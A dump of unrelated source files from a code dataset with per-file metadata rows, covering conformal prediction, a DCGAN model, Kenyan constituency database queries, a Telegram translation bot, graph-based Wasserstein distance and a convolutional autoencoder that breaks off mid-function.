if regression[j][i]<0.5:
a[j][i] = 1 / (1-regression[j][i]+r[j])
# a[j][i] = 1 / (regression[j][i]+r[j])
a0.append(a[j][i])
else:
a[j][i] = 1 / (regression[j][i] + r[j])
#a[j][i] = 1 / (1-regression[j][i]+r[j])
a0.append(a[j][i])
a1socre.append(np.array(a1))
a0socre.append(np.array(a0))
return a1socre,a0socre
#-------表示y为1的概率的奇异值-----------进行奇异映射
def evconformist(self,test_y,regression,r):
'''
:param regression:
:param r:
:return:
'''
a = copy.deepcopy(regression)
for j in range(self.numclasses):
for i in range(len(regression[0])):
if test_y==1:
if regression[j][i] > 0.5:
a[j][i] = 1 / (regression[j][i] + r[j])
else:
a[j][i] = 1 / (1 - regression[j][i] + r[j])
else:
if regression[j][i] < 0.5:
a[j][i] = 1 / (1 - regression[j][i] + r[j])
else:
a[j][i] = 1 / (regression[j][i] + r[j])
return a
def prediction1(self, a_y,a_regression,test_y, testregression,signficace, r):
'''
进行预测
:param testregression: list
:param devregression: list
:param r: 网络敏感数
:return: lastpredict :list
'''
lastpredictpath = os.path.join(self.path, "Ptlastvalue")
testnum = len(testregression[0])
devnum = len(a_regression[0])
onearray = np.ones((testnum,1))
zerosarray =np.zeros((testnum,1))
# -----把所有可能类别进行遍历------
test_Y_zero = []
test_y_one = []
test_other_regression = []
for i in range(self.numclasses):
test_y_one.append(onearray)
test_Y_zero.append(zerosarray)
test_other_regression.append(onearray-testregression[i])
#-----计算出所有的奇异值--------------
print('pt的值{r}'.format(r))
a1socre,a0socre = self.conformist(a_y,a_regression,r)#得奇异值
y_one_ascore = self.evconformist(test_y_one,testregression,r)
y_zero_ascore = self.evconformist(test_Y_zero,testregression,r)#为0时候的奇异值
#-----初始化最大值最终预测------------
initlastpredict=copy.deepcopy(testregression)
#-----计算出p值,并进行预测---------------------
lastpredict,p1tvalue,p0tvalue = super(TPMLCP,self).pvalue(a1socre,a0socre,initlastpredict,y_one_ascore,y_zero_ascore,
testregression,test_other_regression)
accuary,truearray ,nosurerate,nonearray= super(TPMLCP,self).signficance(p1tvalue,p0tvalue,test_y,signficace)
#-------对cp-mcnn点预测的值进行写入-----------
with open(lastpredictpath, 'w') as flie:
for i in range(self.numclasses): # 有多少列
flie.write('第%d类:' % i)
for j in range(len(lastpredict[i])): # 遍历每一列中的每个元素
flie.write(str(lastpredict[i][j]))
flie.write("\n")
return lastpredict,accuary, truearray,nosurerate,nonearray
| true |
490594e7d2cace57ffeb2be2c5481990310ffa3c | Python | gregunz/TorchTools | /torch_tools/models/vision/gans/dcgan.py | UTF-8 | 2,990 | 2.703125 | 3 | [
"MIT"
] | permissive | from argparse import ArgumentParser
from torch import nn
from torch_tools.models.util import GAN, FISModel
from torch_tools.models.vision.util import DCDecoder, DCEncoder
_ld = 128 # default latent_dim
_nf = 64 # default n_filters
_np = 4 # default n_pyramid
_wi = True # default use_custom_weight_init
class DCGAN(GAN, FISModel):
"""
DCGAN Implementation <https://arxiv.org/abs/1511.06434>
Args:
latent_dim: size of the dimension of the latent vector (latent_dim x 1 x 1) used for generator input.
in_channels: number of channels of the generated images.
n_filters: number of filters (kernels) used in the first `PyramidBlock`, then it grows exponentially
with the number of `PyramidBlock` blocks. It controls the capacity of the model.
n_pyramid: number of pyramid blocks, it is related to the image size (H x W). Input image must be
squared (H = W) and powers of 2 starting at 8. `n_pyramid = log_2(H / 8)`.
use_custom_weight_init: whether to use the weight initialization proposed in the paper.
"""
def __init__(self, in_channels, latent_dim=_ld, n_filters=_nf, n_pyramid=_np, use_custom_weight_init=_wi,
**kwargs):
super().__init__(input_size=(latent_dim, 1, 1))
self._generator = DCDecoder(
out_channels=in_channels,
latent_channels=latent_dim,
n_filters=n_filters,
n_pyramid=n_pyramid,
)
self._discriminator = DCEncoder(
in_channels=in_channels,
latent_channels=1, # binary output (real/fake)
n_filters=n_filters,
n_pyramid=n_pyramid,
)
self.latent_dim = latent_dim
h = 2 ** (n_pyramid + 2)
self.image_size = (in_channels, h, h)
if use_custom_weight_init:
self.apply(self.weights_init)
@property
def generator(self) -> nn.Module:
return self._generator
@property
def discriminator(self) -> nn.Module:
return self._discriminator
# custom weights initialization
@staticmethod
def weights_init(module):
classname = module.__class__.__name__
if classname.find('Conv') != -1:
module.weight.data.normal_(0.0, 0.02)
elif classname.find('BatchNorm') != -1:
module.weight.data.normal_(1.0, 0.02)
module.bias.data.fill_(0)
@staticmethod
def add_argz(parser: ArgumentParser):
parser.add_argument('--latent_dim', type=int, default=_ld, help=f'latent dim')
parser.add_argument('--n_pyramid', type=int, default=_np, help=f'number of pyramid blocks')
parser.add_argument('--n_filters', type=int, default=_nf, help=f'num of filters for the 1st pyramid block')
parser.add_argument('--no_custom_weight_init', action='store_false', default=not _nf,
help=f'use this flag for not using the weight initialization proposed in the paper')
| true |
a704f816966b52bc4ce8a27fe9059eab5a812b40 | Python | dty999/pythonLearnCode | /挑战python/095数字序列.py | UTF-8 | 191 | 3 | 3 | [] | no_license | """数字序列定义如下:
f(1) = 1, f(2) = 1, f(n) = (A * f(n - 1) + B * f(n - 2)) % 7.
现在给你A,B和n(1 <= A,B <= 1000, 1 <= n <= 1000000000),请你计算f(n)的值。""" | true |
528da5c372ab17f11cf43fff2df2638bbdad4069 | Python | avagut/mheshimiwa-api | /api_files/utils.py | UTF-8 | 3,874 | 2.515625 | 3 | [
"MIT"
] | permissive | """Mheshimiwa api helper functions."""
from .app import api, db, app
from .models import Constituency, County, Representative
from sqlalchemy import func
def fetch_all_constituencies():
"""Get complete list of constituencies."""
constituency_list = db.session.query(Constituency.constituency_number,
Constituency.constituency_name,
Constituency.county,
Representative.representative,
Representative.party) \
.join(Representative, Constituency.constituency_name ==
Representative.constituency).all()
return constituency_list
def fetch_all_county_constituencies(county_name):
"""Get complete list of constituencies in a county."""
selected_county_name = county_name.replace("+", " ")
constituency_list = db.session.query(Constituency.constituency_number,
Constituency.constituency_name,
Constituency.county,
Representative.representative,
Representative.party) \
.join(Representative, Constituency.constituency_name ==
Representative.constituency) \
.filter(func.lower(Constituency.county) ==
func.lower(selected_county_name)).all()
return constituency_list
def fetch_specific_constituency(constituency):
"""Fetch the details of select constituency."""
selected_const = constituency.replace("+", " ")
constituency = db.session.query(Constituency.constituency_number,
Constituency.constituency_name,
Constituency.county,
Representative.representative,
Representative.party) \
.join(Representative, Constituency.constituency_name ==
Representative.constituency) \
.filter(func.lower(Constituency.constituency_name) ==
func.lower(selected_const)).all()
return constituency
def fetch_specific_county(county_name):
"""Fetch the details of select constituency."""
selected_county_name = county_name.replace("+", " ")
county = db.session.query(County.county_number, \
County.county, \
County.capital, \
County.area, \
Representative.representative, \
Representative.party) \
.join(Representative, County.county == Representative.county) \
.filter(Representative.is_senate == bool(1)) \
.filter(func.lower(County.county)== func.lower(selected_county_name)) \
.order_by(County.order_col).all()
return county
def fetch_all_counties():
"""Get complete list of counties."""
county_list = db.session.query(County.county_number, \
County.county, \
County.capital, \
County.area, \
Representative.representative, \
Representative.party) \
.join(Representative, County.county == Representative.county) \
.filter(Representative.is_senate == bool(1))\
.order_by(County.order_col).all()
return county_list
def validate_this_county(this_county):
"""Validate provided county name."""
county = fetch_specific_county(this_county)
if not county:
return None
else:
county = county[0]
constituencies = Constituency.query.filter(func.lower(
Constituency.county) == func.lower(county.county)).all()
return constituencies | true |
9c3625b2674cb0996593f0081bb496d8ac8f0aa1 | Python | tsinghua-fib-lab/MAG-Customer-Value-Prediction | /EPD/run_exp.py | UTF-8 | 991 | 2.671875 | 3 | [] | no_license | import os
import time
import argparse
def run_experiments(cmd):
for command in cmd:
rty_flag = 1
retry = 0
while rty_flag != 0:
rty_flag = os.system(command)
rty_flag >>= 8
time.sleep(3)
retry += 1
if retry >= 3:
print(' -------------- Command failed -------------- ')
print(command)
return 0
return 0
def get_experiments(path):
cmd = []
with open(path, 'r') as file:
for line in file:
if len(line) > 5:
cmd.append(line.strip())
return cmd
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Experiments')
parser.add_argument('-p', '--config_path', type=str,
default='./exp_config/xxx', help='config path')
args = parser.parse_args()
cmd = get_experiments(args.config_path)
run_experiments(cmd) | true |
89476f0f239892b8bbefab6381c3b65491d980ba | Python | 2heeesss/Problem_Solving | /reBOJ/9935.py | UTF-8 | 345 | 3.09375 | 3 | [] | no_license | import sys
input = sys.stdin.readline
word = input().rstrip()
bomb = input().rstrip()
lastChar = bomb[-1]
stk = []
lw, lb = len(word), len(bomb)
for i in word:
stk.append(i)
if i == lastChar and ('').join(stk[-lb:]) == bomb:
for _ in range(lb):
stk.pop()
if stk:
print(('').join(stk))
else:
print('FRULA')
| true |
4832bad191dc78608c42f48f9afdd23118a1f004 | Python | Aasthaengg/IBMdataset | /Python_codes/p02898/s095702683.py | UTF-8 | 92 | 2.5625 | 3 | [] | no_license | n,k=map(int,input().split());print(len([i for i in list(map(int,input().split())) if i>=k])) | true |
cd3c186bc99bf1723b3229bb69cc2d7237dab4e0 | Python | MartinsJunior/EstAcqua | /NodeABP/myfuncs.py | UTF-8 | 770 | 2.9375 | 3 | [] | no_license | /*
Funcao criada para ler a voltagem no divisor de tensao (na placa desenvolvida para o projeto - visualizar pasta Projeto)
Retorna a voltagem da bateria
*/
from machine import ADC
# myADC
# ADC 12 bits
# Conversao para mV
# Retorna o valor da tensao da bateria em mV
# Divisor de tensao: R1=680k, R2=100k
# ADC Pino 16, (input only; max voltage 1.1V)
def get_batt_mV():
numADCreadings = const(100)
adc = ADC(0)
adcread = adc.channel(pin='P16')
samplesADC = [0.0]*numADCreadings; meanADC = 0.0
i = 0
while (i < numADCreadings):
adcint = adcread()
samplesADC[i] = adcint
meanADC += adcint
i += 1
meanADC /= numADCreadings
mV = ((meanADC*1100/4096)*(680+100)/100)
mV_int = int(mV)
return mV_int
| true |
8a2bf18cbb7fe889a73d882f485df7c79da22779 | Python | leehj8896/PS | /문제풀이/자릿수 더하기/main.py | UTF-8 | 148 | 3.25 | 3 | [] | no_license | def solution(n):
answer = 0
while True:
answer+=n%10
n=n//10
if n==0:
break
return answer | true |
fd1efd93b60f7fb74d1cd0080cb915e92f4c3444 | Python | jacksonyoudi/AlgorithmCode | /PyProject/leetcode/history/n-ary-tree-preorder-traversal.py | UTF-8 | 396 | 3.390625 | 3 | [] | no_license | from typing import List
class Node:
def __init__(self, val=None, children=None):
self.val = val
self.children = children
class NAryTreePreorderTraversal:
def preorder(self, root: 'Node') -> List[int]:
res = []
if root:
res.append(root.val)
for i in root.children:
res.extend(self.preorder(i))
return res
| true |
d1f7e46b3cec3c134ce391e10bd8333157ae81a8 | Python | pythonzhangfeilong/Python_WorkSpace | /8_Demo_Datas/1_Demo_Broken/Demo2/用户登陆.py | UTF-8 | 256 | 3.453125 | 3 | [] | no_license | while True:
username='zhang'
password='123'
a=input('请输入用户名')
b=input('请输入密码')
if username==a and password==b:
print('欢迎登陆')
else:
print('登陆失败,请核对账号密码后重试')
| true |
a48e96f1bba48c39d7d11e84116f399da8feca77 | Python | davidwederstrandtsr/ds-methodologies-exercises | /time_series/acquire.py | UTF-8 | 2,643 | 2.984375 | 3 | [] | no_license | import numpy as np
import pandas as pd
import requests
from os import path
# acquires the data from a url and the end point
def acquire_data(base_url, url_end):
'''
Returns a dataframe after acquiring json data from a url
base_url: the main url of the website being accessed
url_end: the targeted web page url name
'''
df = pd.DataFrame([])
response = requests.get(base_url + f'/api/v1/{url_end}')
data = response.json()
for i in range(1, data['payload']['max_page']+1):
response = requests.get(base_url + f'/api/v1/{url_end}?page={i}')
data = response.json()
i_list = data['payload'][url_end]
# df = df.append(i_list)
df = df.extend(i_list)
return df
#
def check_csv(base_url='', url_end=''):
'''
Returns a dataframe
path.exists checks to see if the csv exists in the local storage
- if the file is there:
-reads the csv to a dataframe
- if the file does not exist:
- calls acquire_data()
- writes csv files to local storage
- reads csv to dataframe
'''
if path.exists(f'{url_end}.cvs'):
df =pd.read_csv(f'{url_end}.cvs', index_col=0)
else:
df = acquire_data(base_url, url_end)
df.to_csv(f'{url_end}.cvs')
df =pd.read_csv(f'{url_end}.cvs', index_col=0)
return df
def merge_sales(base_url, url1='', url2='', url3=''):
'''
Returns merged dataframe
- calls check_csv():
- datframes return:
- items
- stores
- sales
- merges sales and items dataframe:
- the whole sales dataframe is eccientally copied to new dataframe
- where sales.item and items.item_id match:
- that items row is populated on the sales.item row
* note: this is actually done on df not sales ~ sales is not changed
- the same is performed on stores but with the new dataframe
- new dataframe, we drop rows to prevent duplicates:
- store
- item
'''
items = check_csv(base_url, url1)
stores = check_csv(base_url, url2)
sales = check_csv(base_url, url3)
df = sales.merge(items, left_on='item', right_on='item_id')
df = df.merge(stores, left_on='store', right_on='store_id')
df.drop(columns=(['store', 'item']), inplace=True)
df.to_csv('time_sales.csv')
return pd.read_csv('time_sales.csv', index_col=0)
def get_url_data(url):
df = pd.read_csv(f'{url}')
df.to_csv('german_power.csv')
return pd.read_csv('german_power.csv', index_col=0)
| true |
46a610ea2349eeeeab834c75fa3650513fe77a49 | Python | stegua/dotlib | /python/rnd_matrix.py | UTF-8 | 2,640 | 3.09375 | 3 | [
"MIT"
] | permissive | # -*- coding: utf-8 -*-
"""
Created on Fri Apr 7 15:07:22 2017
@author: gualandi
"""
import numpy as np
import networkx as nx
from time import time
from gurobipy import Model, GRB, quicksum
def SolveCuttingPlane(h1, h2, M):
m = Model()
m.setParam(GRB.Param.TimeLimit, 300)
m.setParam(GRB.Param.Method, 1)
# Create variables
x = {}
n = len(h1)
for i in range(n):
for j in range(n):
x[i,j] = m.addVar(obj=M[i][j], name='x'+str(i)+'_'+str(j))
m.update()
for i in range(n):
m.addConstr(quicksum(x[i,j] for j in range(n)) == h1[i])
for j in range(n):
m.addConstr(quicksum(x[i,j] for i in range(n)) == h2[j])
# Solve the model
m.optimize()
return m.getAttr(GRB.Attr.ObjVal)
def Wasserstein(h1, h2, M):
""" Compute the Wasserstein distance between the two histograms
h1 and h2 using distance matrix M """
d = len(h1)
# Build the graph for max flow
G = nx.DiGraph()
# add d nodes for each histrogam
# (d+1) source, (d+2) target
for i in range(d):
G.add_node(i, demand=-h1[i])
G.add_node(d+i, demand=+h2[i])
# Add all edges
for i in range(d):
for j in range(d):
G.add_edge(i, d+j, weight=M[i][j], capacity=min(h1[i], h2[j]))
#flowCost, flowDict = nx.capacity_scaling(G, heap=nx.utils.heaps.PairingHeap)
flowCost, flowDict = nx.capacity_scaling(G, heap=nx.utils.heaps.BinaryHeap)
#flowCost, flowDict = nx.network_simplex(G)
return flowCost
def MakeHistogram(d):
""" Make a normalized random histogram on the simplex """
hist = np.random.permutation(range(d))
hist = [np.random.uniform(0,1) for _ in range(d)]
hsum = sum(hist)
hist = [h/hsum for h in hist]
return hist
def MakeCostMatrix(d):
""" Make a ransom metrix matrix as described in Cuturi 2013 (Figure 4) """
G = nx.erdos_renyi_graph(d, 0.5)
for u,v,w in G.edges(data=True):
w['weight'] = np.random.uniform(0,1)
# All pair shortest path
M = nx.floyd_warshall(G)
return M
#------------------------------------------
# MAIN ENTRY POINT
#------------------------------------------
if __name__ == "__main__":
start = time()
# Random graph as in
d = 512
M = MakeCostMatrix(d)
print("Build matrix time: ", time()-start)
# Create two random histograms of dimension d
h1 = MakeHistogram(d)
h2 = MakeHistogram(d)
print(SolveCuttingPlane(h1, h2, M))
print("Gurobi time: ", time()-start)
#print(Wasserstein(h1, h2, M))
#print("Total time: ", time()-start)
| true |
e9f9feb046fe591c2b47d06df13d9559c01c28c3 | Python | sheriline/python | /voting-app-with-testing/backend/voting_app/irv.py | UTF-8 | 1,358 | 3.328125 | 3 | [] | no_license | def check(data):
eq = {
"position": data[0]["position"],
"candidates": [],
} # Store the candidates with the same percentage but less then 50%
# determine winner
_max = max(data, key=lambda x: x["percent"])
if _max["percent"] > 50:
return _max
loser = min(data, key=lambda x: x["percent"])
if loser["percent"] == _max["percent"]:
for cand in data:
if cand["percent"] == _max["percent"]:
eq["candidates"].append(cand)
return eq
else:
for (idx, dd) in enumerate(data):
if dd["id"] == loser["id"]:
try:
i = idx + 1
data[i]["percent"] = data[i]["percent"] + data[idx]["percent"]
del data[idx]
except IndexError:
i = idx - 1
data[i]["percent"] = data[i]["percent"] + data[idx]["percent"]
del data[idx]
# condition if the total is not equal to 100
if len(data) == 2:
if sum(d["percent"] for d in data) < 100:
min(data, key=lambda x: x["percent"])["percent"] = 50
while _max["percent"] <= 50:
try:
a = check(data)
except Exception:
pass
else:
if a:
return a
break
| true |
6a10bd4052d6e35ceec9eb4d597becd3aef2ae8b | Python | rimjhiim8/GitHub_Tutorial_111 | /Data_Types.py/while_loop.py/for.py/Function.py/arguments.py | UTF-8 | 280 | 4.125 | 4 | [] | no_license | # function with one argument (fname). When the function
# is called, we pass along a first name,
# which is used inside the function to print the full name:
def my_function(fname):
print(fname + "Hello")
my_function("Rimjhiim")
my_function("Sehgal")
my_function("Kakar") | true |
489d213263a45d296cad93b031413197b8dd2b45 | Python | stevenbell/gradescope-utils | /gradescope_utils/autograder_utils/ee200utils.py | UTF-8 | 5,471 | 2.734375 | 3 | [] | no_license | import re
import subprocess as sp
import signal
import os.path
# Small functions that get used repeatedly in creating and running tests
# on student C/C++ code.
def test_build(test, target, wdir, makefile='test_makefile', maketarget=None):
""" Try building `target` in `wdir` using a `makefile` and send
any output to the console. Fail `test` if there is a problem.
"""
# If the user didn't specify a separate makefile target, then just use the
# name of the output file. This is the normal case, except for phony targets.
if maketarget is None:
maketarget = target
# If the target already exists, remove it
# Simpler to put this here than require every makefile to have a `clean` command
if os.path.isfile(wdir + target):
os.remove(wdir + target)
print("Removing submitted binary...")
try:
log = sp.check_output(["make", "-f", wdir + makefile, "--silent", "--always-make", "-C", wdir, maketarget], stderr = sp.STDOUT)
except sp.CalledProcessError as e:
test.fail("Failed to compile. Output is: {}".format(e.output.decode('utf-8')))
if len(log.strip()) > 0:
print("g++ output:\n{}".format(log.decode('utf-8')))
# check that the output exists
val = os.path.isfile(wdir + target)
test.assertTrue(val, "Make/gcc/g++ didn't produce a binary")
# Otherwise, we're all good
print('Compiled successfully!')
def test_coverage(test, source, target, wdir, makefile='test_makefile'):
""" Runs gcov (generally on the student's test code) and fails the test if
there is less than 100% coverage on the file under test. """
try:
log = sp.check_output(["make", "-f", wdir + makefile, "CFLAGS=-O0 --coverage", "--silent", "--always-make", "-C", wdir, target], stderr = sp.STDOUT)
except sp.CalledProcessError as e:
test.fail("Failed to compile for test coverage. Output is: {}".format(e.output.decode('utf-8')))
safe_run(test, [wdir + target], cwd=wdir)
# Somewhere around gcc 11, the naming of the gcov output files changed. As of gcc 11,
# `gcc source1.c source2.c -o binary` generates files like binary-source1.gcda
# See https://gcc.gnu.org/onlinedocs/gcc/Instrumentation-Options.html
gcov_name = f"{target}-{source}"
result = harness_run(test, ["gcov", "-n", gcov_name], cwd=wdir)
pctmatch = re.search('\d+\.?\d+\%', result)
if pctmatch.group() != "100.00%":
test.fail("Test coverage is only " + pctmatch.group())
print("Test coverage is 100%!\n(Remember, this doesn't mean your code is correct, or that you're testing everything you should. It does mean that your tests exercise every path through your program.)")
def run_valgrind(test, command, **kwargs):
if not type(command) is list:
command = [command]
try:
log = sp.check_output(["valgrind", "--tool=memcheck", "--leak-check=yes", "--error-exitcode=4"] + command, stderr = sp.STDOUT, **kwargs)
except sp.CalledProcessError as e:
test.fail("Valgrind reported errors:\n {}".format(e.output.decode('utf-8')))
print("Valgrind clean!")
def safe_run(test, command, timeout=5, **kwargs):
""" Wrapper around check_output which fails the test if the code segfaults or
takes too long. A brief informative message is logged with the failure."""
try:
result = sp.check_output(command, timeout=timeout, **kwargs)
except sp.CalledProcessError as e:
if e.returncode == -signal.SIGSEGV:
test.fail("Program segfaulted")
elif e.returncode == -signal.SIGABRT:
test.fail("Program was aborted (assert failed or memory was corrupted)")
else:
# We don't know what students will return from main, so assume
# anything other than a segfault/abort is ok.
result = e.output
except sp.TimeoutExpired as e:
test.fail("Program timed out after {} seconds".format(timeout))
return result.decode('utf-8')
def harness_run(test, command, timeout=5, **kwargs):
"""Equivalent to safe_run, except that it prints different error messages.
This function should be used for test harness operations, while safe_run
should be used any time we're calling student code."""
try:
result = sp.check_output(command, timeout=timeout, **kwargs)
except sp.CalledProcessError as e:
if e.returncode == -signal.SIGSEGV:
test.fail("Test harness segfaulted - check with teaching staff")
else:
test.fail("Test harness call failed - check with teaching staff")
except sp.TimeoutExpired as e:
test.fail("Test harness timed out - check with teaching staff")
return result.decode('utf-8')
def findString(haystack):
matches = re.findall('###(?:.|\s)*?###', haystack) # (?: non-capturing, *? non-greedy
# There should be exactly one match, or we're hosed
if len(matches) != 1:
return None
# Strip off the ###
return matches[0][3:-3]
def findInteger(haystack):
matches = re.findall('###[+-]?\d+###', haystack)
# There should be exactly one match, or we're hosed
if len(matches) != 1:
return None
# Strip off the ### and convert to an integer
return int(matches[0][3:-3])
def findDouble(haystack):
matches = re.findall('###[+-]?\d+\.\d+###', haystack)
# There should be exactly one match, or we're hosed
if len(matches) != 1:
return None
# Strip off the ### and convert to an integer
return float(matches[0][3:-3])
| true |
f969073787e49c3e70d5afe34eed6f0c8037be10 | Python | maughray/Telegram-Translator-Bot | /main.py | UTF-8 | 1,939 | 2.5625 | 3 | [] | no_license | from telegram.ext import Updater, CommandHandler, MessageHandler, Filters
from google_trans_new import google_translator
import logging
TELEGRAM_TOKEN = '1787783787:AAHw8Nw4aieDmt0Dub7oiEjCgCkFIvmzXvA'
TARGET_LANGUAGE_KEY = 'target_language'
translator = google_translator()
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)
logger = logging.getLogger(__name__)
def start(update, context):
update.message.reply_text('EZ Translator - Free, unlimited translation\nSet target language: /set_language [CODE]\nWrite any message and I will translate it.')
def help(update, context):
update.message.reply_text('Set target language:\n/set_language [CODE] - Setting target language\nWrite any message and I will translate it.')
def translate(update, context):
if TARGET_LANGUAGE_KEY in context.user_data.keys():
target_language = context.user_data[TARGET_LANGUAGE_KEY]
result = translator.translate(update.message.text, lang_tgt=target_language)
update.message.reply_text(result)
else:
update.message.reply_text('You must specify target language!')
def set_language(update, context):
language = update.message.text.split()[1]
context.user_data[TARGET_LANGUAGE_KEY] = language # TODO: validate language
update.message.reply_text('Language set: ' + language)
def error(update, context):
update.message.reply_text('Something went wrong!')
logger.warning('Update "%s" caused error "%s"', update, context.error)
def main():
updater = Updater(TELEGRAM_TOKEN, use_context=True)
dp = updater.dispatcher
dp.add_handler(CommandHandler("start", start))
dp.add_handler(CommandHandler("help", help))
dp.add_handler(CommandHandler("set_language", set_language))
dp.add_handler(MessageHandler(Filters.text, translate))
dp.add_error_handler(error)
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main() | true |
b348873950571a97ca4b956b29ea108bb68056d5 | Python | ehdgua01/Algorithms | /coding_test/programmers/stack_queue/top/solution.py | UTF-8 | 462 | 3.046875 | 3 | [] | no_license | """
프로그래머스 알고리즘 문제
https://programmers.co.kr/learn/courses/30/lessons/42588
"""
def solution(heights: list) -> list:
answer: list = []
heights.reverse()
for idx, height in enumerate(heights, start=1):
receiver = 0
for i, h in enumerate(heights[idx:]):
if h > height:
receiver = len(heights) - i - idx
break
answer.insert(0, receiver)
return answer
| true |
3b2150825c381b2e21d787059d18d4e2ad07fd23 | Python | benkiel/python_workshops | /2019_3_Cooper_Type/RoboFont/convert_to_hex.py | UTF-8 | 150 | 2.65625 | 3 | [
"MIT"
] | permissive | glyph = CurrentGlyph()
# glyph.appendAnchor("top", (300,300))
print(glyph.unicodes)
for u in glyph.unicodes:
print('0x{:02x}'.format(integer)) | true |
425da8ff0e53af6a51eb897d9f8b417e67c550e6 | Python | sunqf/data-tools | /corpus/bicorpus/bing/vocab.py | UTF-8 | 685 | 2.515625 | 3 | [] | no_license | #!/usr/bin/env python3.6
# -*- coding: utf-8 -*-
import asyncio
import asyncpg
import re
from corpus.bicorpus import db
_sep = re.compile('[;,:,/ ]')
async def build():
terms = set()
db_conn = await db.connect()
async with db_conn.transaction():
records = await db_conn.fetch('SELECT ch, en from dictall_term')
for record in records:
chs = _sep.split(record['ch'])
ens = _sep.split(record['en'])
terms.update(chs)
terms.update(ens)
terms.add(record['en'])
for term in terms:
print(term)
loop = asyncio.get_event_loop()
loop.run_until_complete(build())
loop.close()
| true |
38cdb2f62cd8523d745c822789402b6f73198782 | Python | makwanas/Deep-Co-clustering-improvisations | /ConvDeepCC/ConvDeepCC/Code/core/general/pretrain_conv_autoencoder.py | UTF-8 | 10,706 | 2.625 | 3 | [
"MIT"
] | permissive | import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
import math
# ---------------------------------
mnist = input_data.read_data_sets("/tmp/data/", one_hot=True)
n_classes = 10
batch_size = 100
# tf Graph Input
# mnist data image of shape 28*28=784
x = tf.placeholder(tf.float32, [None, 1024], name='InputData')
# 0-9 digits recognition => 10 classes
y = tf.placeholder(tf.float32, [None, 10], name='LabelData')
# This is
logs_path = "./logs/"
# ---------------------------------
"""
We start by creating the layers with name scopes so that the graph in
the tensorboard looks meaningful
"""
# ---------------------------------
def conv2d(input, name, kshape, strides=[1, 1, 1, 1]):
with tf.variable_scope(name, reuse=tf.AUTO_REUSE):
W = tf.get_variable(name='w_'+name,
shape=kshape,
initializer=tf.contrib.layers.xavier_initializer(uniform=False))
b = tf.get_variable(name='b_' + name,
shape=[kshape[3]],
initializer=tf.contrib.layers.xavier_initializer(uniform=False))
out = tf.nn.conv2d(input, W, strides=strides, padding='SAME')
out = tf.nn.bias_add(out, b)
out = tf.nn.relu(out)
return out
# ---------------------------------
def deconv2d(input, name, kshape, n_outputs, strides=[1, 1]):
with tf.name_scope(name):
out = tf.contrib.layers.conv2d_transpose(input,
num_outputs=n_outputs,
kernel_size=kshape,
stride=strides,
padding='SAME',
weights_initializer=tf.contrib.layers.xavier_initializer_conv2d(
uniform=False),
biases_initializer=tf.contrib.layers.xavier_initializer(
uniform=False),
activation_fn=tf.nn.relu)
return out
# ---------------------------------
def maxpool2d(x, name, kshape=[1, 2, 2, 1], strides=[1, 2, 2, 1]):
with tf.name_scope(name):
out = tf.nn.max_pool(x,
ksize=kshape, # size of window
strides=strides,
padding='SAME')
return out
# ---------------------------------
def upsample(input, name, factor=[2, 2]):
size = [int(input.shape[1] * factor[0]), int(input.shape[2] * factor[1])]
with tf.name_scope(name):
out = tf.image.resize_bilinear(
input, size=size, align_corners=None, name=None)
return out
# ---------------------------------
def fullyConnected(input, name, output_size):
with tf.variable_scope(name, reuse=tf.AUTO_REUSE):
input_size = input.shape[1:]
input_size = int(np.prod(input_size))
W = tf.get_variable(name='w_'+name,
shape=[input_size, output_size],
initializer=tf.contrib.layers.xavier_initializer(uniform=False))
b = tf.get_variable(name='b_'+name,
shape=[output_size],
initializer=tf.contrib.layers.xavier_initializer(uniform=False))
input = tf.reshape(input, [-1, input_size])
out = tf.nn.relu(tf.add(tf.matmul(input, W), b))
return out
# ---------------------------------
def dropout(input, name, keep_rate):
with tf.name_scope(name):
out = tf.nn.dropout(input, keep_rate)
return out
# ---------------------------------
# Let us now design the autoencoder
class PretrainAutoencoder:
def __init__(self, config, num_drop_out):
self.num_dim = config
self.code_layer = len(config)
self.num_dropout_layer = num_drop_out
def run(self, x, keep_prob):
img_size = int(math.sqrt(self.num_dim[0]))
print("img_size:", img_size)
input = None
output = []
fc2 = []
print("input size:", x.shape)
if img_size**2 != self.num_dim[0]:
input = tf.reshape(x, shape=[-1, 15, 11, 1])
# encoding part
c1 = conv2d(input, name='c1', kshape=[5, 5, 1, 25])
p1 = maxpool2d(c1, name='p1')
do1 = dropout(p1, name='do1', keep_rate=0.9)
do1 = tf.reshape(do1, shape=[-1,8*6*25])
fc1 = fullyConnected(do1, name='fc1-2',output_size=8*6*5)
do2 = dropout(fc1, name='do2-2',keep_rate=0.9)
fc2 = fullyConnected(do2,name='fc2-2',output_size=8*6)
# Decoding part
fc3 = fullyConnected(fc2, name='fc3-2', output_size=8*6*5)
do3 = dropout(fc3, name='do3-2', keep_rate=0.9)
fc4 = fullyConnected(do3, name='fc4-2', output_size=8*6*25)
do4 = dropout(fc4, name='do3-2', keep_rate=0.9)
do4 = tf.reshape(do4, shape=[-1, 8, 6, 25])
dc1 = deconv2d(do4, name='dc1-2', kshape=[5, 5], n_outputs=25)
up1 = upsample(dc1, name='up1-2', factor=[2, 2])
output = fullyConnected(up1, name='output-2', output_size=15*11)
print("output shape:", output.shape)
print("fc2 shape:", fc2.shape)
#output = tf.reshape(output, shape=[15,11])
#fc2 = tf.reshape(output, shape=[512,83])
else:
input = tf.reshape(x, shape=[-1, img_size, img_size, 1])
# encoding part
c1 = conv2d(input, name='c1', kshape=[5, 5, 1, 25])
p1 = maxpool2d(c1, name='p1')
do1 = dropout(p1, name='do1', keep_rate=0.9)
do1 = tf.reshape(do1, shape=[-1, (img_size//2)*(img_size//2)*25])
fc1 = fullyConnected(do1, name='fc1', output_size=(
img_size//2)*(img_size//2)*5)
do2 = dropout(fc1, name='do2', keep_rate=0.9)
fc2 = fullyConnected(
do2, name='fc2', output_size=48)
# Decoding part
fc3 = fullyConnected(
fc2, name='fc3', output_size=(img_size//2) * (img_size//2) * 5)
do3 = dropout(fc3, name='do3', keep_rate=0.9)
fc4 = fullyConnected(
do3, name='fc4', output_size=(img_size//2) * (img_size//2) * 25)
do4 = dropout(fc4, name='do3', keep_rate=0.9)
do4 = tf.reshape(do4, shape=[-1, (img_size//2), (img_size//2), 25])
dc1 = deconv2d(do4, name='dc1', kshape=[5, 5], n_outputs=25)
up1 = upsample(dc1, name='up1', factor=[2, 2])
